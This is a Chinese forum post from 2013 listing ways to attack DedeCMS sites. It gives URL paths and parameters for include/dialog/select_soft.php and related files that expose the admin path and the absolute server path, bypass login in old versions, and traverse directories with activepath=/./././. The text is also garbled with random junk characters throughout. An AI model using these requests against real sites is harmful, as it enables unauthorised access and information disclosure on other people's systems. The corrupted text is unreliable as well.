1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理2 H9 N, A, P* i8 }; [
0 X; c8 R4 k. i6 V6 q+ P" `; A# t员帐号,新版本的就直接转向了后台./ ]2 S; G0 e: ~; Z3 u+ d
. G# Q4 L/ F# |) |8 y
2.include/dialog/config.php会爆出后台管理路径7 L# i9 h3 p9 {( n
& i4 K }4 l& G
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录" y4 `' g6 y$ \. r2 t/ q: e
! m. k: Z4 f' {- {+ z# s' v P
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.% O+ W1 r2 {5 ^/ r
& v. F. d" |5 {. v5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉' X$ `9 v$ C# i" I6 R G% D
) I7 y8 l) g R9 I# O* h3 Y
到根目录去.不过这些版本的访问地址有些不同.+ y; h1 r' G+ M" P7 ]& O% Y
地址为require/dialog/select_soft.php?activepath=/././././././././; c' L8 X( N' c
, y9 C# B3 a- i7 J
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦../ i( S% P- g4 y+ a
存在相同问题的文件还有6 b" k# d. W4 x: e
include\dialog\select_images.php$ x8 J4 R: `# h. { j
include\dialog\select_media.php
! M7 U& ~6 t0 U/ u2 w# ?4 Ainclude\dialog\select_templets.php5 \+ k# Q) s) T, V( Y2 d2 G
|
发表于 2013-4-16 16:50:43
收藏
支持
反对